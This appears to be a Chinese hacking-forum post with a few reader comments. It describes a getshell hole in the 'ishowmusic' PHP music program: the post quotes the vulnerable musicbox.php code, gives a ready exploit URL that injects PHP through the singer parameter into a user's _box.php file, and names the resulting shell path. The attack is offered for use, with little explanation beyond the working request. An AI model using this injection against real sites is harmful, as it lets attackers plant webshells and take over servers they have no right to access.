ishowmusic getshell
在某非主流站上看到的这套程序.就下来学习一下.
这个程序好多getshell .
//漏洞代码
musicbox.php
if (GetCookie('userlogin')!="1"){ //验证方式...
Showmsg("no","您还没有登录或注册!","登录或注册", "login.php?jumpurl=musicbox.php");
exit;
}
else { $username=GetCookie('username'); }
$line=$songname."|".$singer."|".$songid."|".$addtime."|\n";
writetofile("$userdir/{$username}_box.php",$line);
访问 http://www.baidu.com/musicbox.php?songid=1&songname=ddddd&singer=<?php%20phpinfo();%20?>&action=add
如果不行把歌曲ID换下
shell地址 http://www.baidu.com/user/admin_box.php //前提user目录默认
评论6次
不错不错 学xi
让我震惊了
这xi统写数据进PHP前居然不在开头加exit();。。。。。
这里面是利用程序的写歌曲信息文件功能,写出木马文件,好样的~比较蛋疼```
支持,不懂php的菜鸟表示压力大啊,解释都不带的说,